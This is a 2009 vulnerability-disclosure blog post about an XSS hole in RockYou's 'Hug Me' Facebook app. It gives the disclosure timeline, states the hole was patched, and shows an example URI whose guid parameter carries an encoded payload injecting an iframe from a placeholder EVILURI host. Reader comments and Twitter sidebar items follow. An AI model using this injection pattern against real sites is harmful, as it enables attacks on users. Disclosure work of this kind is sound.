FAXX Hack: Hug Me

Current Monthly Active Users: 3,157,995

Current Rank on Application Leaderboard: 55

Application Developer: RockYou

Responsiveness: I notified RockYou and Facebook of this hole on Sep. 14th, and have reminded Facebook a few times since that it remains unpatched. I’ve received no communication from RockYou. Update: Facebook contacted me again this evening and said RockYou had deployed a patch, which I have confirmed.

Vulnerability Status: Unpatched Patched Sep. 30

Example URI: http://apps.facebook.com/doittome/refreshAd.php?guid=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

2 Comments

Jimmy says:
September 30, 2009 at 4:06 pm

Your site is useless now that you wait release until patched. Used to visit your site everyday. My last visit.
Russ says:
March 18, 2010 at 12:53 am

Just another Script kiddie visiting your site for something easy to use. Don’t mind these children as they know nothing better to do with there time then to surf for exploits that will end them up in a mess all to themselves.

And apparently you can't disable YouTube automatically maintaining your viewing history? #anothercachetoclear
about 18 hours ago from web
YouTube began using my Google acct; just found this setting on: "Please use my account information to provide me with relevant advertising"
about 18 hours ago from web
Facebook is definitely the new email... every time I login, I see more joke images that friends have forwarded.
04:29:53 PM October 07, 2011 from web
More interesting XSS challenges from @0x6D6172696F lately: http://t.co/5fVmZzJw solutions posted, http://t.co/y4QNU86V just went live!
03:57:50 PM October 06, 2011 from web
Wait, what? RT @InsideNetwork Facebook Reveals More Details About Timeline, Including an Approval Process for OG Apps http://t.co/RAYAQm7k
07:27:11 PM October 05, 2011 from web

FAXX Hack: Hug Me

Leave a Reply

Further Updates from Twitter

Search Archives

Facebook Page

Content License

Post Archives